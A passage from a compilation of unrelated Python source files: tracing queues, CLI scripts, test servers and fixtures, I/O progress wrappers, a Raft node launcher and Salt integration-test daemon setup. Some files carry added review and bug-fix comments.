    if grace_multiplier is not None:
        # Accept the same behaviour as superclass
        return super().is_alive(grace_multiplier=grace_multiplier)
    health_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
    if self.state != State.RUNNING:
        return False
    seconds_since_heartbeat = (timezone.utcnow() - self.latest_heartbeat).total_seconds()
    return seconds_since_heartbeat < health_threshold
|
writer.py |
# stdlib
import atexit
import logging
import threading
import random
import os
import time
from ddtrace import api
log = logging.getLogger(__name__)
# Upper bounds on buffered items before Q starts randomly overwriting.
MAX_TRACES = 1000
MAX_SERVICES = 1000
# Seconds to wait at shutdown for queued traces to flush (see AsyncWorker).
DEFAULT_TIMEOUT = 5
class AgentWriter(object):
    """Buffers finished traces/services and ships them to a local agent."""

    def __init__(self, hostname='localhost', port=8126):
        self._pid = None        # pid that owns the queues and worker
        self._traces = None
        self._services = None
        self._worker = None
        self.api = api.API(hostname, port)

    def write(self, spans=None, services=None):
        """Queue spans and/or services for asynchronous delivery."""
        # if the worker needs to be reset, do it.
        self._reset_worker()
        if spans:
            self._traces.add(spans)
        if services:
            self._services.add(services)

    def _reset_worker(self):
        """(Re)create queues and the flush thread after a fork or thread death."""
        # if this queue was created in a different process (i.e. this was
        # forked) reset everything so that we can safely work from it.
        pid = os.getpid()
        if self._pid != pid:
            log.debug("resetting queues. pids(old:%s new:%s)", self._pid, pid)
            self._traces = Q(max_size=MAX_TRACES)
            self._services = Q(max_size=MAX_SERVICES)
            self._worker = None
            self._pid = pid
        # ensure we have an active thread working on this queue
        worker_missing_or_dead = not self._worker or not self._worker.is_alive()
        if worker_missing_or_dead:
            self._worker = AsyncWorker(self.api, self._traces, self._services)
class AsyncWorker(object):
    """Background thread that drains trace/service queues through `api`.

    The flush thread is started on construction and marked daemon so it
    never blocks interpreter exit; `_on_shutdown` is registered with
    atexit to give in-flight traces a bounded chance to flush.
    """

    def __init__(self, api, trace_queue, service_queue, shutdown_timeout=DEFAULT_TIMEOUT):
        self._trace_queue = trace_queue
        self._service_queue = service_queue
        self._lock = threading.Lock()
        self._thread = None
        self._shutdown_timeout = shutdown_timeout
        self.api = api
        self.start()

    def is_alive(self):
        return self._thread.is_alive()

    def start(self):
        """Start the flush thread (idempotent) and hook interpreter exit."""
        with self._lock:
            if not self._thread:
                log.debug("starting flush thread")
                self._thread = threading.Thread(target=self._target)
                # Fix: use the `daemon` attribute instead of the
                # deprecated Thread.setDaemon() (removal planned).
                self._thread.daemon = True
                self._thread.start()
                atexit.register(self._on_shutdown)

    def stop(self):
        """
        Close the trace queue so that the worker will stop the execution
        """
        with self._lock:
            if self._thread and self.is_alive():
                self._trace_queue.close()

    def join(self, timeout=2):
        """
        Wait for the AsyncWorker execution. This call doesn't block the execution
        and it has a 2 seconds of timeout by default.
        """
        self._thread.join(timeout)

    def _on_shutdown(self):
        """atexit hook: close the queue and wait briefly for a final flush."""
        with self._lock:
            if not self._thread:
                return
            # wait for in-flight queues to get traced.
            time.sleep(0.1)
            self._trace_queue.close()
            size = self._trace_queue.size()
            if size:
                key = "ctrl-break" if os.name == 'nt' else 'ctrl-c'
                log.debug("Waiting %ss for traces to be sent. Hit %s to quit.",
                          self._shutdown_timeout, key)
                timeout = time.time() + self._shutdown_timeout
                while time.time() < timeout and self._trace_queue.size():
                    # FIXME[matt] replace with a queue join
                    time.sleep(0.05)

    def _target(self):
        """Worker loop: send traces/services until the trace queue closes."""
        while True:
            traces = self._trace_queue.pop()
            if traces:
                # If we have data, let's try to send it.
                try:
                    self.api.send_traces(traces)
                except Exception as err:
                    # Fix: lazy %-style logging instead of eager
                    # str.format; rendered message is unchanged.
                    log.error("cannot send spans: %s", err)
                # Services are only flushed alongside a trace batch.
                services = self._service_queue.pop()
                if services:
                    try:
                        self.api.send_services(services)
                    except Exception as err:
                        log.error("cannot send services: %s", err)
            elif self._trace_queue.closed():
                # no traces and the queue is closed. our work is done.
                return
            time.sleep(1)  # replace with a blocking pop.
class Q(object):
    """
    Q is a threadsafe queue that let's you pop everything at once and
    will randomly overwrite elements when it's over the max size.

    ``add`` returns True whenever the item was stored (appended or written
    over a random slot) and False when the queue has been closed.
    """

    def __init__(self, max_size=1000):
        self._things = []
        self._lock = threading.Lock()
        self._max_size = max_size
        self._closed = False

    def size(self):
        """Return the number of buffered items."""
        with self._lock:
            return len(self._things)

    def close(self):
        """Refuse any further additions."""
        with self._lock:
            self._closed = True

    def closed(self):
        with self._lock:
            return self._closed

    def add(self, thing):
        """Store *thing*, overwriting a random slot when full.

        Returns False when the queue is closed, True otherwise.
        """
        with self._lock:
            if self._closed:
                return False
            # max_size <= 0 means "unbounded".
            if len(self._things) < self._max_size or self._max_size <= 0:
                self._things.append(thing)
            else:
                # Queue is full: overwrite a random existing element so
                # memory stays bounded while newer data still has a chance
                # to survive.
                idx = random.randrange(0, len(self._things))
                self._things[idx] = thing
            # BUG FIX: the overwrite branch used to fall off the end and
            # implicitly return None even though the item WAS stored.
            return True

    def pop(self):
        """Atomically return and clear all buffered items (None when empty)."""
        with self._lock:
            if not self._things:
                return None
            things = self._things
            self._things = []
            return things
|
conftest.py | from pytest import fixture
from threading import Thread
from mm_ide import ide
@fixture(scope="function")
def start_ui():
    """Launch the IDE UI loop in a background thread for one test.

    The thread is daemonized so a UI main loop that never returns cannot
    keep the pytest process alive after the session finishes (previously
    the non-daemon thread could block interpreter exit).
    """
    Thread(target=ide.main, daemon=True).start()
|
simple_text_generation.py | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
import argparse
import nltk
from simple_text_generation_util.simple_text_generation_util import generate_text
def func(args):
    """Generate text, fetching the NLTK 'punkt' tokenizer data on demand."""
    tokenizer = nltk.tokenize.word_tokenize
    try:
        # Probe once; raises LookupError when the punkt data is absent.
        tokenizer("test")
    except LookupError:
        nltk.download('punkt')
    generate_text(args, tokenizer, ' ')
def main():
    """Build the CLI parser for simple text generation and dispatch to func().

    The interface is unchanged: option names, flags and destinations are the
    same as before; parsed args are forwarded via set_defaults(func=func).
    """
    parser = argparse.ArgumentParser(
        description='Simple Text Generation\n' +
        '\n' +
        'Generates a text based on a model that predicts the next word ' +
        'based on the word index series and its length' +
        '', formatter_class=argparse.RawTextHelpFormatter)
    # `default=` on a required argument is dead code (argparse errors out
    # before a default could ever apply), so the misleading defaults on the
    # required options below were dropped; the help text still documents
    # the conventional file names.
    parser.add_argument(
        '-m',
        '--model',
        help='path to model nnp file (model) default=results.nnp',
        required=True)
    parser.add_argument(
        '-v',
        '--input-variable',
        help='variable name for input data (variable) default=x',
        default='x')
    parser.add_argument(
        '-l',
        '--length-variable',
        help='variable name for text length (variable) default=l',
        default='l')
    parser.add_argument(
        '-d',
        '--index-file-input',
        help='index file input (csv)',
        required=True)
    # BUG FIX: the help text promised default=I am, but no default was set,
    # so args.seed_text silently came through as None.
    parser.add_argument(
        '-s', '--seed-text', help='seed text (text), default=I am',
        default='I am')
    # NOTE(review): help claims default=True, but `store_true` makes the
    # effective default False; left as-is to preserve behavior -- confirm
    # which is intended.
    parser.add_argument(
        '-n',
        '--normalize',
        help='normalize characters in seed text with unicodedata (bool) default=True',
        action='store_true')
    parser.add_argument(
        '-b',
        '--mode',
        help='mode (option:sampling,beam-search) default=sampling',
        default='sampling')
    parser.add_argument(
        '-t',
        '--temperature',
        help='temperature parameter for sampling mode(float), default=0.5',
        type=float,
        default=0.5)
    parser.add_argument(
        '-e',
        '--num-text',
        help='number of text to generate, beam-width for beam search (int), default=8',
        type=int,
        default=8)
    parser.add_argument(
        '-o',
        '--output',
        help='path to output image file (csv) default=text_generation.csv',
        required=True)
    parser.set_defaults(func=func)
    args = parser.parse_args()
    args.func(args)
if __name__ == '__main__':
    # thread.stack_size(8 * 1024 * 1024)
    # Deep recursive generation (e.g. beam search) can exceed the default
    # recursion limit, so raise it substantially before starting.
    sys.setrecursionlimit(1024 * 1024)
    # NOTE(review): main() runs in a worker thread, presumably to get a
    # larger stack, but the stack_size() call above is commented out -- as
    # written the thread uses the platform default stack size; confirm.
    main_thread = threading.Thread(target=main)
    main_thread.start()
    main_thread.join()
|
fast_api_test_server.py | import logging
import threading
import time
from typing import Optional
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import Response
from uvicorn.config import Config
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer, CustomServer
class FastApiPyctuatorServer(PyctuatorServer):
    # Test harness: a FastAPI app instrumented with Pyctuator plus two helper
    # endpoints used by the integration tests, served by a uvicorn
    # CustomServer running in a background thread.

    def __init__(self) -> None:
        self.app = FastAPI(
            title="FastAPI Example Server",
            description="Demonstrate Spring Boot Admin Integration with FastAPI",
            docs_url="/api",
        )
        # Registers the actuator endpoints on self.app and starts periodic
        # registration against the (test) admin server on port 8001.
        self.pyctuator = Pyctuator(
            self.app,
            "FastAPI Pyctuator",
            "http://localhost:8000",
            "http://localhost:8000/pyctuator",
            "http://localhost:8001/register",
            registration_interval_sec=1,
        )

        # Endpoint used by tests to emit a known string into the log so the
        # logfile actuator can be asserted against.
        @self.app.get("/logfile_test_repeater", tags=["pyctuator"])
        # pylint: disable=unused-variable
        def logfile_test_repeater(repeated_string: str) -> str:
            logging.error(repeated_string)
            return repeated_string

        self.server = CustomServer(config=(Config(app=self.app, loop="asyncio")))
        self.thread = threading.Thread(target=self.server.run)

        # Endpoint used by the httptrace tests: echoes a request header and
        # can delay its reply to make timings observable.
        # NOTE(review): `sleep_sec: Optional[int]` has no default value, so
        # FastAPI treats it as a required query parameter -- confirm callers
        # always pass it, or add `= None`.
        @self.app.get("/httptrace_test_url")
        # pylint: disable=unused-variable
        def get_httptrace_test_url(request: Request, sleep_sec: Optional[int]) -> Response:
            # Sleep if requested to sleep - used for asserting httptraces timing
            if sleep_sec:
                logging.info("Sleeping %s seconds before replying", sleep_sec)
                time.sleep(sleep_sec)

            # Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
            return Response(headers={"resp-data": str(request.headers.get("User-Data"))}, content="my content")

    def start(self) -> None:
        # Launch uvicorn in the background thread and block until it reports
        # startup complete.
        self.thread.start()
        while not self.server.started:
            time.sleep(0.01)

    def stop(self) -> None:
        # Stop admin registration first, then ask uvicorn to exit and wait.
        self.pyctuator.stop()
        self.server.should_exit = True
        self.thread.join()
|
io_utils.py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import threading
from queue import Queue
from tqdm import tqdm
class LoadingProgressTracker:
    # Shared (class-level) state for rendering graph-loading progress as a
    # single tqdm bar across all wrapped output streams.

    # The active tqdm bar, or None when no load is in progress.
    progbar = None
    # Count of stubs observed so far in the current loading cycle.
    cur_stub = 0
    # Marker lines emitted by the graph loader; each one observed advances
    # the bar one step (see StdStreamWrapper._show_progress).
    stubs = [
        "PROGRESS--GRAPH-LOADING-READ-VERTEX-0",
        "PROGRESS--GRAPH-LOADING-READ-VERTEX-100",
        "PROGRESS--GRAPH-LOADING-READ-EDGE-0",
        "PROGRESS--GRAPH-LOADING-READ-EDGE-100",
        "PROGRESS--GRAPH-LOADING-CONSTRUCT-VERTEX-0",
        "PROGRESS--GRAPH-LOADING-CONSTRUCT-VERTEX-100",
        "PROGRESS--GRAPH-LOADING-CONSTRUCT-EDGE-0",
        "PROGRESS--GRAPH-LOADING-CONSTRUCT-EDGE-100",
        "PROGRESS--GRAPH-LOADING-SEAL-0",
        "PROGRESS--GRAPH-LOADING-SEAL-100",
    ]
class StdStreamWrapper(object):
    """Stand-in for sys.stdout/sys.stderr that consumes graph-loading
    progress stub lines (rendering them as a tqdm bar instead) and can
    buffer everything else for later polling."""

    def __init__(self, std_stream, queue=None, drop=True):
        self._stream_backup = std_stream
        self._lines = Queue() if queue is None else queue
        self._drop = drop

    @property
    def stdout(self):
        """The wrapped (original) stream."""
        return self._stream_backup

    @property
    def stderr(self):
        """The wrapped (original) stream."""
        return self._stream_backup

    def drop(self, drop=True):
        """Toggle buffering of written lines for poll()."""
        self._drop = drop

    def write(self, line):
        filtered = self._filter_progress(line)
        if filtered is None:
            # Progress stub: consumed by the tqdm bar, never echoed.
            return
        # Strip any non-ASCII characters before forwarding.
        sanitized = filtered.encode("ascii", "ignore").decode("ascii")
        self._stream_backup.write(sanitized)
        if not self._drop:
            self._lines.put(sanitized)

    def flush(self):
        self._stream_backup.flush()

    def poll(self, block=True, timeout=None):
        """Return the next buffered line (only useful with drop=False)."""
        return self._lines.get(block=block, timeout=timeout)

    def _show_progress(self):
        """Advance the shared tqdm bar one stub; reset after the last one."""
        total = len(LoadingProgressTracker.stubs)
        if LoadingProgressTracker.progbar is None:
            LoadingProgressTracker.progbar = tqdm(
                desc="Loading Graph", total=total, file=sys.stderr
            )
        LoadingProgressTracker.progbar.update(1)
        LoadingProgressTracker.cur_stub += 1
        if LoadingProgressTracker.cur_stub == total:
            LoadingProgressTracker.cur_stub = 0
            LoadingProgressTracker.progbar.close()
            LoadingProgressTracker.progbar = None
            sys.stderr.flush()

    def _filter_progress(self, line):
        """Return *line* unchanged, or None when it is a progress stub."""
        if "PROGRESS--GRAPH" not in line:
            return line
        self._show_progress()
        return None
class PipeWatcher(object):
    def __init__(self, pipe, sink, queue=None, drop=True):
        """Watch a pipe, and buffer its output if drop is False."""
        self._pipe = pipe
        self._sink = sink
        self._drop = drop
        self._lines = queue if queue is not None else Queue()

        def _pump(watcher):
            # Forward every line to the sink; buffer it as well when the
            # watcher is not dropping. Both operations are best-effort.
            for line in watcher._pipe:
                try:
                    watcher._sink.write(line)
                except:  # noqa: E722
                    pass
                try:
                    if not watcher._drop:
                        watcher._lines.put(line)
                except:  # noqa: E722
                    pass

        # Daemon thread so a still-open pipe never blocks interpreter exit.
        self._polling_thread = threading.Thread(target=_pump, args=(self,))
        self._polling_thread.daemon = True
        self._polling_thread.start()

    def poll(self, block=True, timeout=None):
        """Return the next buffered line (only useful with drop=False)."""
        return self._lines.get(block=block, timeout=timeout)

    def drop(self, drop=True):
        """Toggle buffering of forwarded lines for poll()."""
        self._drop = drop
|
raft_example.py | #!/usr/bin/env python3
import argparse
import logging
import socketserver
import threading
import time
import random
from raft_node import Node
from raft_peer import Peer
from raft_states import NodePersistentState
from raft_state_machine import DummyStateMachine
from raft_rpc_client import RpcClient
from raft_messages import VoteMessage
# Configure root logging once, at import time, for all raft components.
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
def parse_peer(peer_str):
    """Parse an "id:host:port" peer spec into an (int, str, int) tuple."""
    node_id, host, port = peer_str.split(":")
    return int(node_id), host, int(port)
def main():
    """Parse CLI options, run a raft node in a background thread, and idle
    in the foreground until interrupted."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--node_id", type=int, default=0)
    parser.add_argument("--port", type=int, default=9999)
    parser.add_argument("--host", type=str, default="0.0.0.0")
    parser.add_argument("--peers", type=str, nargs="+", default=[])
    parser.add_argument("--state", type=str, default="./state.json")
    parser.add_argument("--random_seed", type=int, default=0)
    args = parser.parse_args()

    random.seed(args.random_seed)
    socketserver.TCPServer.allow_reuse_address = True

    # Build Peer objects from the "id:host:port" specs on the command line.
    peers = [Peer(*parse_peer(spec)) for spec in args.peers]

    prev_state = NodePersistentState.load(args.state)
    node = Node(args.node_id, prev_state, peers, DummyStateMachine())

    node_thread = threading.Thread(target=node.start, args=[args.host, args.port])
    node_thread.daemon = True
    node_thread.start()

    testingRPCClient = False  # Add to test RPC Client. Continuing example
    client = RpcClient() if testingRPCClient else None
    try:
        while True:
            # Optional smoke test of the RPC client from node 0 only.
            if testingRPCClient and args.node_id == 0:
                t, s = client.send(peers[0], VoteMessage(term=0, candidate_id=0, last_log_idx=0, last_log_term=0))
                print("Term", t, "Success?:", s)
            time.sleep(1)
    except KeyboardInterrupt:
        raise SystemExit
    finally:
        node.stop()
if __name__ == '__main__':
    # Script entry point: parse args and run the raft node until Ctrl-C.
    main()
|
__init__.py | # -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import print_function
import os
import re
import sys
import time
import errno
import shutil
import pprint
import logging
import tempfile
import subprocess
import multiprocessing
from hashlib import md5
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Matches the "function already running" error emitted by the state system;
# used by ModuleCase._check_state_return to detect and kill stalled jobs.
STATE_FUNCTION_RUNNING_RE = re.compile(
    r'''The function (?:"|')(?P<state_func>.*)(?:"|') is running as PID '''
    r'(?P<pid>[\d]+) and was started at (?P<date>.*) with jid (?P<jid>[\d]+)'
)
# Absolute path of this test package, the repository root, and the directory
# that holds the salt libraries.
INTEGRATION_TEST_DIR = os.path.dirname(
    os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SALT_LIBS = os.path.dirname(CODE_DIR)
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.case import ShellTestCase
from salttesting.mixins import CheckShellBinaryNameAndVersionMixIn
from salttesting.parser import PNUM, print_header, SaltTestcaseParser
from salttesting.helpers import ensure_in_syspath, RedirectStdStreams
# Update sys.path
ensure_in_syspath(CODE_DIR, SALT_LIBS)
# Import Salt libs
import salt
import salt._compat
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
# Import 3rd-party libs
import yaml
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
# Scratch locations used by the daemons and state trees during a test run.
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
# Interpreter name matching the running Python, e.g. "python2.7".
PYEXEC = 'python{0}.{1}'.format(*sys.version_info)
# Directory of fake binaries prepended to PATH by TestDaemon._enter_mockbin.
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
TMP_PRODENV_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-prodenv-state-tree')
TMP_CONF_DIR = os.path.join(TMP, 'config')
log = logging.getLogger(__name__)
def skip_if_binaries_missing(binaries, check_all=False):
    '''
    Return a test decorator that skips when required binaries are absent.

    binaries  -- iterable of executable names to look for on PATH
    check_all -- when True every binary must exist (skip on the first
                 missing one); when False at least one must exist.
    '''
    # While there's no new release of salt-testing
    def _id(obj):
        return obj

    if sys.version_info < (2, 7):
        from unittest2 import skip  # pylint: disable=F0401
    else:
        from unittest import skip  # pylint: disable=E0611

    if check_all:
        for binary in binaries:
            if salt.utils.which(binary) is None:
                # BUG FIX: the binary name was never interpolated into the
                # skip message; format it in so the reason names the binary.
                return skip(
                    'The {0!r} binary was not found'.format(binary)
                )
    elif salt.utils.which_bin(binaries) is None:
        return skip(
            'None of the following binaries was found: {0}'.format(
                ', '.join(binaries)
            )
        )
    return _id
def run_tests(*test_cases, **kwargs):
    '''
    Run integration tests for the chosen test cases.
    Function uses optparse to set up test environment

    Accepts only the ``needs_daemon`` keyword argument; when True (the
    default) a full TestDaemon (master/minion/syndic) is started around
    each test case.
    '''
    needs_daemon = kwargs.pop('needs_daemon', True)
    if kwargs:
        raise RuntimeError(
            'The \'run_tests\' function only accepts \'needs_daemon\' as a '
            'keyword argument'
        )

    class TestcaseParser(SaltTestcaseParser):
        # Parser subclass adding suite-specific CLI switches.
        def setup_additional_options(self):
            self.add_option(
                '--sysinfo',
                default=False,
                action='store_true',
                help='Print some system information.'
            )
            self.output_options_group.add_option(
                '--no-colors',
                '--no-colours',
                default=False,
                action='store_true',
                help='Disable colour printing.'
            )

        def run_testcase(self, testcase, needs_daemon=True):  # pylint: disable=W0221
            # Wrap the run in a TestDaemon context when daemons are needed.
            if needs_daemon:
                print(' * Setting up Salt daemons to execute tests')
                with TestDaemon(self):
                    return SaltTestcaseParser.run_testcase(self, testcase)
            return SaltTestcaseParser.run_testcase(self, testcase)

    parser = TestcaseParser()
    parser.parse_args()
    for case in test_cases:
        # finalize(1) exits with a failure code on the first failing case.
        if parser.run_testcase(case, needs_daemon=needs_daemon) is False:
            parser.finalize(1)
    parser.finalize(0)
class TestDaemon(object):
    '''
    Set up the master and minion daemons, and run related cases
    '''
    # Seconds granted for minions to connect back / finish a sync.
    MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120

    def __init__(self, parser):
        # parser is the (Salt)TestcaseParser driving this run; its options
        # (clean, sysinfo, no_colors, output_columns) control behaviour here.
        self.parser = parser
        self.colors = get_colors(self.parser.options.no_colors is False)

    def __enter__(self):
        '''
        Start a master and minion
        '''
        running_tests_user = pwd.getpwuid(os.getuid()).pw_name
        self.master_opts = salt.config.master_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
        )
        self.master_opts['user'] = running_tests_user
        minion_config_path = os.path.join(
            INTEGRATION_TEST_DIR, 'files', 'conf', 'minion'
        )
        self.minion_opts = salt.config.minion_config(minion_config_path)
        self.minion_opts['user'] = running_tests_user
        self.syndic_opts = salt.config.syndic_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'),
            minion_config_path
        )
        self.syndic_opts['user'] = running_tests_user
        #if sys.version_info < (2, 7):
        #    self.minion_opts['multiprocessing'] = False
        self.sub_minion_opts = salt.config.minion_config(
            os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
        )
        self.sub_minion_opts['root_dir'] = os.path.join(TMP, 'subsalt')
        self.sub_minion_opts['user'] = running_tests_user
        #if sys.version_info < (2, 7):
        #    self.sub_minion_opts['multiprocessing'] = False
        self.smaster_opts = salt.config.master_config(
            os.path.join(
                INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
            )
        )
        self.smaster_opts['user'] = running_tests_user

        # Set up config options that require internal data
        self.master_opts['pillar_roots'] = {
            'base': [os.path.join(FILES, 'pillar', 'base')]
        }
        self.master_opts['file_roots'] = {
            'base': [
                os.path.join(FILES, 'file', 'base'),
                # Let's support runtime created files that can be used like:
                # salt://my-temp-file.txt
                TMP_STATE_TREE
            ],
            # Alternate root to test __env__ choices
            'prod': [
                os.path.join(FILES, 'file', 'prod'),
                TMP_PRODENV_STATE_TREE
            ]
        }
        self.master_opts['ext_pillar'].append(
            {'cmd_yaml': 'cat {0}'.format(
                os.path.join(
                    FILES,
                    'ext.yaml'
                )
            )}
        )
        self.master_opts['extension_modules'] = os.path.join(
            INTEGRATION_TEST_DIR, 'files', 'extension_modules'
        )
        # clean up the old files
        self._clean()

        # Point the config values to the correct temporary paths
        for name in ('hosts', 'aliases'):
            optname = '{0}.file'.format(name)
            optname_path = os.path.join(TMP, name)
            self.master_opts[optname] = optname_path
            self.minion_opts[optname] = optname_path
            self.sub_minion_opts[optname] = optname_path

        verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
                    os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
                    os.path.join(self.master_opts['pki_dir'],
                                 'minions_rejected'),
                    os.path.join(self.master_opts['cachedir'], 'jobs'),
                    os.path.join(self.smaster_opts['pki_dir'], 'minions'),
                    os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
                    os.path.join(self.smaster_opts['pki_dir'],
                                 'minions_rejected'),
                    os.path.join(self.smaster_opts['cachedir'], 'jobs'),
                    os.path.dirname(self.master_opts['log_file']),
                    self.minion_opts['extension_modules'],
                    self.sub_minion_opts['extension_modules'],
                    self.sub_minion_opts['pki_dir'],
                    self.master_opts['sock_dir'],
                    self.smaster_opts['sock_dir'],
                    self.sub_minion_opts['sock_dir'],
                    self.minion_opts['sock_dir'],
                    TMP_STATE_TREE,
                    TMP_PRODENV_STATE_TREE,
                    TMP,
                    ],
                   running_tests_user)

        # Set up PATH to mockbin
        self._enter_mockbin()

        # Spawn each daemon (two masters, two minions, one syndic) in its
        # own process.
        master = salt.master.Master(self.master_opts)
        self.master_process = multiprocessing.Process(target=master.start)
        self.master_process.start()

        minion = salt.minion.Minion(self.minion_opts)
        self.minion_process = multiprocessing.Process(target=minion.tune_in)
        self.minion_process.start()

        sub_minion = salt.minion.Minion(self.sub_minion_opts)
        self.sub_minion_process = multiprocessing.Process(
            target=sub_minion.tune_in
        )
        self.sub_minion_process.start()

        smaster = salt.master.Master(self.smaster_opts)
        self.smaster_process = multiprocessing.Process(target=smaster.start)
        self.smaster_process.start()

        syndic = salt.minion.Syndic(self.syndic_opts)
        self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
        self.syndic_process.start()

        if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
            from copy import deepcopy
            try:
                os.makedirs('/tmp/salttest/conf')
            except OSError:
                pass
            master_opts = deepcopy(self.master_opts)
            minion_opts = deepcopy(self.minion_opts)
            master_opts.pop('conf_file', None)
            minion_opts.pop('conf_file', None)
            minion_opts.pop('grains', None)
            minion_opts.pop('pillar', None)
            # IMPROVED: use context managers so the dump files are closed
            # deterministically instead of leaking open handles.
            with open('/tmp/salttest/conf/master', 'w') as wfh:
                wfh.write(yaml.dump(master_opts))
            with open('/tmp/salttest/conf/minion', 'w') as wfh:
                wfh.write(yaml.dump(minion_opts))

        self.minion_targets = set(['minion', 'sub_minion'])
        self.pre_setup_minions()
        self.setup_minions()

        if self.parser.options.sysinfo:
            try:
                print_header(
                    '~~~~~~~ Versions Report ', inline=True,
                    width=getattr(self.parser.options, 'output_columns', PNUM)
                )
            except TypeError:
                print_header('~~~~~~~ Versions Report ', inline=True)
            print('\n'.join(salt.version.versions_report()))

            try:
                print_header(
                    '~~~~~~~ Minion Grains Information ', inline=True,
                    width=getattr(self.parser.options, 'output_columns', PNUM)
                )
            except TypeError:
                print_header('~~~~~~~ Minion Grains Information ', inline=True)
            grains = self.client.cmd('minion', 'grains.items')
            minion_opts = self.minion_opts.copy()
            minion_opts['color'] = self.parser.options.no_colors is False
            salt.output.display_output(grains, 'grains', minion_opts)

        try:
            print_header(
                '=', sep='=', inline=True,
                width=getattr(self.parser.options, 'output_columns', PNUM)
            )
        except TypeError:
            print_header('', sep='=', inline=True)

        try:
            return self
        finally:
            self.post_setup_minions()

    @property
    def client(self):
        '''
        Return a local client which will be used for example to ping and sync
        the test minions.
        This client is defined as a class attribute because its creation needs
        to be deferred to a latter stage. If created it on `__enter__` like it
        previously was, it would not receive the master events.
        '''
        return salt.client.LocalClient(
            mopts=self.master_opts
        )

    def __exit__(self, type, value, traceback):
        '''
        Kill the minion and master processes
        '''
        salt.master.clean_proc(self.sub_minion_process, wait_for_kill=50)
        self.sub_minion_process.join()
        salt.master.clean_proc(self.minion_process, wait_for_kill=50)
        self.minion_process.join()
        salt.master.clean_proc(self.master_process, wait_for_kill=50)
        self.master_process.join()
        salt.master.clean_proc(self.syndic_process, wait_for_kill=50)
        self.syndic_process.join()
        salt.master.clean_proc(self.smaster_process, wait_for_kill=50)
        self.smaster_process.join()
        self._exit_mockbin()
        self._clean()

    def pre_setup_minions(self):
        '''
        Subclass this method for additional minion setups.
        '''

    def setup_minions(self):
        '''
        Wait for the minions to connect back and make sure their dynamic
        modules/states are synced; returns False on failure.
        '''
        # Wait for minions to connect back
        wait_minion_connections = multiprocessing.Process(
            target=self.wait_for_minion_connections,
            args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
        )
        wait_minion_connections.start()
        wait_minion_connections.join()
        wait_minion_connections.terminate()
        if wait_minion_connections.exitcode > 0:
            print(
                '\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
                    **self.colors
                )
            )
            return False
        del wait_minion_connections

        sync_needed = self.parser.options.clean
        if self.parser.options.clean is False:
            def sumfile(fpath):
                # Since we will be doing this for small files, it should be ok
                fobj = fopen(fpath)
                m = md5()
                while True:
                    d = fobj.read(8096)
                    if not d:
                        break
                    m.update(d)
                return m.hexdigest()
            # Since we're not cleaning up, let's see if modules are already up
            # to date so we don't need to re-sync them
            modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
            for fname in os.listdir(modules_dir):
                if not fname.endswith('.py'):
                    continue
                dfile = os.path.join(
                    '/tmp/salttest/cachedir/extmods/modules/', fname
                )
                if not os.path.exists(dfile):
                    sync_needed = True
                    break
                sfile = os.path.join(modules_dir, fname)
                if sumfile(sfile) != sumfile(dfile):
                    sync_needed = True
                    break

        if sync_needed:
            # Wait for minions to "sync_all"
            for target in [self.sync_minion_modules,
                           self.sync_minion_states]:
                sync_minions = multiprocessing.Process(
                    target=target,
                    args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
                )
                sync_minions.start()
                sync_minions.join()
                if sync_minions.exitcode > 0:
                    return False
                sync_minions.terminate()
                del sync_minions
        return True

    def post_setup_minions(self):
        '''
        Subclass this method to execute code after the minions have been setup
        '''

    def _enter_mockbin(self):
